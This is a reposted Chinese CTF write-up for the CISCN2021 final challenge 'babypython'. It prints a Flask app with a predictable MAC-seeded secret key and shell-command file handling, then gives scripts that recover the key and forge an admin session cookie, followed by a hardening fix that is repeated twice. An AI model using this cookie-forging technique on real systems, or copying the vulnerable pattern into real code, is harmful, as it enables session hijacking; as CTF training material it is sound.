当前位置:物联沃-IOTWORD物联网 > 技术教程 > CISCN2021总决赛精彩瞬间:babypython 56揭晓
代码收藏家代码收藏家 技术教程

CISCN2021总决赛精彩瞬间:babypython 56揭晓

题目分析

打开题目,以为是一道文件上传题,实际不是

Xshell连接

python文件在/app/y0u_found_it/y0u_found_it_main.py

 -*- coding: utf-8 -*-
from flask import Flask,session,render_template,redirect, url_for, escape, request,Response
import uuid
import base64
import random
import secret
from werkzeug.utils import secure_filename
import os
random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)
app.config['UPLOAD_FOLDER'] = './uploads'
app.config['MAX_CONTENT_LENGTH'] = 100 * 1024
ALLOWED_EXTENSIONS = set(['zip'])

def allowed_file(filename):
    return '.' in filename and \
           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS


@app.route('/', methods=['GET'])
def index():
    error = request.args.get('error', '')
    
    if(error == '1'):
        session.pop('username', None)
        return render_template('index.html', forbidden=1)
    if not 'username' in session:
        session['username'] = "guest"

    if 'username' in session:
        return render_template('index.html', user=session['username'], secret=secret.secret)
    else:
        
        return render_template('index.html')


@app.route('/upload', methods=['POST'])
def upload_file():
    if 'the_file' not in request.files:
        return redirect(url_for('index'))
    file = request.files['the_file']
    if file.filename == '':
        return redirect(url_for('index'))
    if file and allowed_file(file.filename):
        filename = secure_filename(file.filename)
        file_save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
        if(os.path.exists(file_save_path)):
            return 'This file already exists'
        file.save(file_save_path)
    else:
        return 'This file is not a zipfile'


    try:
        extract_path = file_save_path + '_'
        os.system('unzip -n ' + file_save_path + ' -d '+ extract_path)
        read_obj = os.popen('cat ' + extract_path + '/*')
        file = read_obj.read()
        read_obj.close()
        os.system('rm -rf ' + extract_path)
    except Exception as e:
        file = None

    os.remove(file_save_path)
    if(file != None):
        if(file.find(base64.b64decode('ZmxhZw==').decode('utf-8')) != -1):
            return redirect(url_for('index', error=1))
    return Response(file)


if __name__ == '__main__':
    #app.run(debug=True)
    app.run(host='127.0.0.1', debug=False, port=10008)

random生成伪随机数,uuid.getnode()获取主机物理地址
物理地址的位置:/sys/class/net/eth0/address
我们知道了机器的物理地址,又知道了cookie的构造方式,可以构造admin用户的cookie
生成随机数的脚本:

import uuid
import random

random.seed(int("4e4f4c54d4c1",16))
print(str(random.random()*100))

生成随机数:71.44910352920047
注意使用python3
使用flask模板开启一个http服务来获取admin的cookie

from flask import *

app = Flask(__name__)
app.config['SECRET_KEY'] = "71.44910352920047"


@app.route("/", methods=['GET', 'POST'])
def login():
    session['username'] = u'admin'
    return 'baichu'


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8008)

访问,获得cookie

加固

将伪随机数变为随机数即可

import secrets

app.config['SECRET_KEY'] = str(secrets.randbelow(10000000000))

或者

import secrets

app.config['SECRET_KEY'] = str(secrets.randbelow(10000000000))

修改之后访问
/check
/flag
获得flag

作者:白初&

物联沃分享整理
物联沃-IOTWORD物联网 » CISCN2021总决赛精彩瞬间:babypython 56揭晓

代码收藏家 普通

分享到:

相关推荐

发表回复